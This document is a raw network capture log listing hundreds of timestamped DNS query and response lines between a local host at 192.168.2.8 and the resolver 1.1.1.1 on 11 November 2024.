                                                                                                                                                                                                          Nov 11, 2024 18:24:23.484029055 CET53505291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.484754086 CET4917653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.484914064 CET6279953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.487610102 CET53578181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.489660025 CET53533631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.491170883 CET5269053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.491575956 CET53527901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.493506908 CET5179253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.494565010 CET53527131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.496081114 CET53627991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.496902943 CET53608511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.499545097 CET53635441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.500998974 CET53524241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.502255917 CET53526901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.516485929 CET5221153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.516511917 CET4943853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.516797066 CET6131553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.516994953 CET5011853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.517740011 CET6373853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.517947912 CET4987453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.517997980 CET6103253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.518063068 CET53491761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.518191099 CET6102553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.525393009 CET53517921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.526379108 CET53522111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.528520107 CET5669053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.528892040 CET53610321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.530241966 CET53575021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.535099030 CET53498741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.543221951 CET53566901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.547774076 CET53494381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.549132109 CET53501181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.549144030 CET53637381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.549392939 CET53610251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.550438881 CET53613151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.007000923 CET5535953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.010462999 CET5502153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.025588989 CET53553591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.027153969 CET5459853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.027379036 CET53550211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.028271914 CET4915853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.028999090 CET6370453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.033610106 CET5079653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.035629988 CET5615853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.038991928 CET53491581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.042332888 CET53637041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.045739889 CET53507961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.047533989 CET5681153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.048887014 CET5015753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.049413919 CET6485953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.050230980 CET6223453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.050337076 CET6030553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.050941944 CET6174353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.051161051 CET5748353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.051701069 CET5354053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.051779032 CET5866053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.056968927 CET5851953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.057550907 CET53622341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.058239937 CET53568111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.058983088 CET53545981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.060688972 CET53603051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.061213017 CET53574831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.062539101 CET53535401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.065920115 CET6460553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.066096067 CET5041253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.066415071 CET5657653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.066615105 CET5821453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.066819906 CET5989653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.067183018 CET5120853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.067262888 CET53561581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.067379951 CET5695553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.069334984 CET6013453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.070612907 CET5940253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.071604967 CET5364253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.071866989 CET6472253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.072489977 CET5895453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.073900938 CET4990253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.075335026 CET6143553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.075604916 CET53598961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.075686932 CET53582141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.076206923 CET53646051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.076441050 CET53565761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.077337980 CET53512081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.078018904 CET53569551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.079775095 CET53501571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.080641985 CET53536421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.081621885 CET53594021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.081736088 CET53648591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.081816912 CET53504121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.082119942 CET53617431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.083039045 CET53647221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.083081961 CET53589541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.084244013 CET53601341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.084259987 CET53586601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.086596966 CET53614351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.088627100 CET5709953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.088888884 CET53585191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.089690924 CET5847753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.090740919 CET6373653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091094971 CET6443253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091262102 CET6132153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091712952 CET6075653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091773033 CET6477853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.091912985 CET5235353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.092030048 CET4956053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.092196941 CET5429853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.092505932 CET4933353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.095715046 CET5797553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.102293015 CET53607561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.102572918 CET5861353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.102893114 CET6227953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.102933884 CET53613211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103166103 CET5758253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103390932 CET5253153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103523970 CET4947353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103615046 CET53493331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.103766918 CET6002953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104053020 CET53542981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104115963 CET5600253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104182959 CET6192753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104543924 CET6283553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104655981 CET5974553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104867935 CET6027053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104883909 CET53499021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.104998112 CET5752653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.106698036 CET53523531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.107137918 CET53579751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.107518911 CET53584771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.108128071 CET5358353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.108695030 CET5887053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.108814955 CET4917953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.109180927 CET6367753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.109430075 CET5747253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.109513998 CET5800153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.113228083 CET53622791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.114159107 CET53600291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.114434958 CET53619271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.114590883 CET53560021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.114603043 CET53602701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.114799976 CET53494731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.114820004 CET53628351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.119688988 CET53636771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.120364904 CET53588701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.120476961 CET53574721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.121012926 CET53586131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.121704102 CET53570991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.122973919 CET53637361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.122983932 CET53644321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.124492884 CET53647781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.124502897 CET53495601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.127470016 CET53491791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.127506971 CET53535831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.132097006 CET5343853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.132529020 CET5943553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.132541895 CET6000953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.134546041 CET53575821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.134983063 CET53597451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.135157108 CET53525311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.136701107 CET53575261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.142679930 CET53580011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.162491083 CET53594351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.163290977 CET53534381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.164048910 CET53600091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.610183001 CET5893453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.610431910 CET5006953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.614903927 CET5808553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.619265079 CET53500691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.620711088 CET5898053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.624219894 CET5402353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.625890017 CET53580851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.627198935 CET5585953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.628623009 CET53589341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.631048918 CET53589801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.637609959 CET53558591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.643320084 CET5938653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.643511057 CET5374853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.651710033 CET6381853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.653243065 CET53537481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.653371096 CET53593861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.656663895 CET53540231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.662312984 CET53638181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.668806076 CET5707353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.669006109 CET5228653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.669764042 CET5879353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.679081917 CET53522861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.682343006 CET6101753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.685319901 CET6245653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.685934067 CET5657353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.687715054 CET5787553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.689266920 CET6505853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.692586899 CET53610171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.694878101 CET5459353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.695846081 CET5708553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.695858002 CET5360753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.696187973 CET6078153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.697367907 CET53565731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.699510098 CET5018153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.699847937 CET5089853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.700241089 CET53587931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.701839924 CET53570731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.702136040 CET5253853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.705684900 CET53536071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.706408024 CET53607811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.706450939 CET53578751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.709561110 CET53501811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712033987 CET53525381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712369919 CET5270853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712738037 CET6183853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712860107 CET5487553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.712924957 CET5800153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.717247963 CET53624561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.719611883 CET53580011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.720391989 CET5505953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.720864058 CET6184053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721031904 CET6270053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721129894 CET5319153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721220970 CET5648353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721605062 CET5305853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721952915 CET53650581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.722567081 CET53548751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.722605944 CET53527081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.724235058 CET53618381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.726210117 CET53545931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.729072094 CET53570851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.730257988 CET53531911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.731211901 CET6026653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.731616974 CET53508981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.732768059 CET4927053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733011961 CET5266553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733165979 CET6286553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733557940 CET5831653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733674049 CET5078653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733782053 CET5312953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733880997 CET5270753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733985901 CET5958953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734227896 CET6499453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734265089 CET5804253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734455109 CET4985553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734467983 CET6215253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734674931 CET5702953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.738521099 CET53602661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.742716074 CET53492701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.743181944 CET53628651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.743639946 CET53595891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.744250059 CET53527071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.744622946 CET53498551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.745874882 CET5091553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746000051 CET5235953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746175051 CET6147853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746357918 CET53570291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746678114 CET5218153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746841908 CET6284153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747005939 CET6371853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747189999 CET6296553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747616053 CET5233653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747848034 CET5809953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748145103 CET5611953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748385906 CET5793653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748577118 CET5429153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748842001 CET5623853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.751365900 CET53550591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.752484083 CET53530581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.752604008 CET5559853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.752970934 CET5970353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.753329992 CET53580421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.753376007 CET53627001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.753386021 CET53564831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.756266117 CET53521811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.756412983 CET5361953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.756620884 CET53629651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.757869959 CET53562381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.757920027 CET53628411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.757930994 CET53580991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.763252020 CET53597031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.764676094 CET53526651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.764796972 CET53531291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.764904022 CET53583161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.765109062 CET53649941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.765153885 CET53621521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.765830040 CET53507861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.776371002 CET53614781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.777452946 CET53509151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.777904034 CET53523591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.777915955 CET53637181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.779441118 CET53523361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.779535055 CET53579361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.779546022 CET53542911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.783787966 CET53555981.1.1.1192.168.2.8
